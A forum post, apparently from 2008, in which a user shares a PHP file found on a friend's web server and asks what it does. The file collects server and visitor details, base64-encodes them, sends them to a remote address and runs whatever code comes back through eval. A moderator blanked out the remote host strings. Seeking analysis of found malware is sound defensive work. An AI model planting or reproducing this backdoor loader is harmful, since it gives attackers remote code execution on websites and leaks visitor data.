A friend of mine got this file uploaded to his webserver, probably by a hacker but this is not confirmed. He had lots of trouble deleting it but managed it at the end.

He sendt me the code and I'm having a hard time figuring out what it does, all I can see is that it is encoding lots of server information but I don't know the purpose and I was wondering if any of you could figure out what is does?

DISCLAIMER:
If you do not know what you are doing, do not attemt to use this code on your own sit as it may harm your site!

<? error_reporting(0);
$s="e";
$a=(isset($_SERVER["HTTP_HOST"])?$_SERVER["HTTP_HOST"]:$HTTP_HOST);
$b=(isset($_SERVER["SERVER_NAME"])?$_SERVER["SERVER_NAME"]:$SERVER_NAME);
$c=(isset($_SERVER["REQUEST_URI"])?$_SERVER["REQUEST_URI"]:$REQUEST_URI);
$d=(isset($_SERVER["PHP_SELF"])?$_SERVER["PHP_SELF"]:$PHP_SELF);
$e=(isset($_SERVER["QUERY_STRING"])?$_SERVER["QUERY_STRING"]:$QUERY_STRING);
$f=(isset($_SERVER["HTTP_REFERER"])?$_SERVER["HTTP_REFERER"]:$HTTP_REFERER);
$g=(isset($_SERVER["HTTP_USER_AGENT"])?$_SERVER["HTTP_USER_AGENT"]:$HTTP_USER_AGENT);
$h=(isset($_SERVER["REMOTE_ADDR"])?$_SERVER["REMOTE_ADDR"]:$REMOTE_ADDR);
$i=(isset($_SERVER["SCRIPT_FILENAME"])?$_SERVER["SCRIPT_FILENAME"]:$SCRIPT_FILENAME);
$j=(isset($_SERVER["HTTP_ACCEPT_LANGUAGE"])?$_SERVER["HTTP_ACCEPT_LANGUAGE"]:$HTTP_ACCEPT_LANGUAGE);
$str=base64_encode($a).".".base64_encode($b).".".base64_encode($c).".". base64_encode($d).".". base64_encode($e).".". base64_encode($f).".". base64_encode($g).".". base64_encode($h).".$s.". base64_encode($i) .".". base64_encode($j);
if((include(base64_decode("...").base64_decode("...")."/?".$str)));
else if(include(base64_decode("...").base64_decode("...")."/?".$str));
else if($c=file_get_contents(base64_decode("...").$str))eval($c);
else{$cu=curl_init(base64_decode("...").$str);
curl_setopt($cu,CURLOPT_RETURNTRANSFER,1);
$str=curl_exec($cu);
curl_close($cu);
eval($str);
}; ?>

[edited by: jatar_k at 11:05 pm (utc) on July 8, 2008]
[edit reason] obfuscated [/edit]